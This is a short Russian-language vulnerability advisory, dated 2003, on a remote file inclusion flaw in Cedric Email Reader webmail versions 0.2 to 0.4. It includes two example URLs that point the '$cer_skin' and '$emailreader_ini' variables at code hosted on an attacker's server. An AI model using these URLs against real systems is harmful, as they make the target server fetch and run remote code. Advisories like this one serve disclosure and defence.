Security Lab

Выполнение произвольного кода в Cedric Email Reader

Дата публикации:13.02.2003
Всего просмотров:1259
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Cedric email reader
Описание: Уязвимость включения файла обнаружена в программе Cedric Email Reader webmail. Удаленный атакующий может выполнять произвольный код на уязвимом сервере.

Файл 'email.php3' (в версии 0.2) или 'email.php' (в версии 0.3) включают '$cer_skin' переменную, но предварительно ее не определяют. В результате удаленный атакующий может создать специально сформированный URL, в котором переменная '$cer_skin' ссылается на удаленно расположенный файл. Этот файл будет выполнен на Web сервере с привилегиями Web сервера. Пример:

http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php
Также в версии 0.4 уязвим сценарий 'webmail/lib/emailreader_execute_on_each_page.inc.php', включающий переменную '$emailreader_ini'. Пример:
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php

Уязвимость обнаружена в Cedric Email Reader 0.2, 0.3, 0.4
Ссылки: Cedric Email Reader (PHP)